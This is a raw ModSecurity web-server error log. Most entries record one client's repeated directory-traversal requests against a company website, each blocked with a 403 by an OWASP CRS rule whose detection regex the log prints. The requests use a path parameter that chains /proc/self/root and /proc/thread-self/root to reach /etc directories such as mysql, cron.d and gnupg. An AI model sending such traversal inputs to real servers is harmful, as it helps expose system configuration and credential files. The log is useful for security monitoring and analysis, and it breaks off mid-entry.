[Mon Mar 16 17:10:13.592727 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.243.203:41756] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjpVajLEzk2WiQ-10orQAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:14.833413 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.243.203:41766] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjps_BxrYCr4hPDw8AMwAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:16.220498 2026] [:error] [pid 10831:tid 140411658000128] [client 74.7.243.203:41782] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjqI6lpbStxTqkSkuAcAAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:17.543413 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.243.203:41796] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjqUr9dMAiw-8KANNdTAAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:18.871874 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:41806] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjqtSswJuvopo3lOh08gAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:20.114590 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:45528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjrLABkC4fWIHEf8ELBwAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:21.474760 2026] [:error] [pid 29802:tid 140411716749056] [client 74.7.243.203:45538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjrc_BxrYCr4hPDw8ANQAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:22.666993 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.243.203:45544] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjrrABkC4fWIHEf8ELCAAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:23.936378 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:45548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjr7ABkC4fWIHEf8ELCQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:25.166211 2026] [:error] [pid 10831:tid 140411574073088] [client 74.7.243.203:45556] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjsY6lpbStxTqkSkuAcwAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:26.527409 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:45568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjstSswJuvopo3lOh0-gAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:27.710751 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.243.203:45584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjs0r9dMAiw-8KANNdTQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:29.094535 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:45588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjtbABkC4fWIHEf8ELDwAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:30.298048 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:45532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjtrysWC90G-1nBrBaCwAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:31.663762 2026] [:error] [pid 10651:tid 140411691570944] [client 74.7.243.203:45538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjt7ysWC90G-1nBrBaDAAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:32.920311 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:45554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjuLABkC4fWIHEf8ELEgAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:34.167191 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:45560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjurysWC90G-1nBrBaDQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 17:10:35.453044 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:45568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhju7ysWC90G-1nBrBaDgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:36.907360 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:45576] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjvNSswJuvopo3lOh0_QAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:38.140300 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.243.203:45590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjvs_BxrYCr4hPDw8AOAAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:39.368849 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.243.203:45594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjv1ajLEzk2WiQ-10oswAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:40.713298 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:32852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhjwLABkC4fWIHEf8ELEwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:10:41.999996 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:32866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 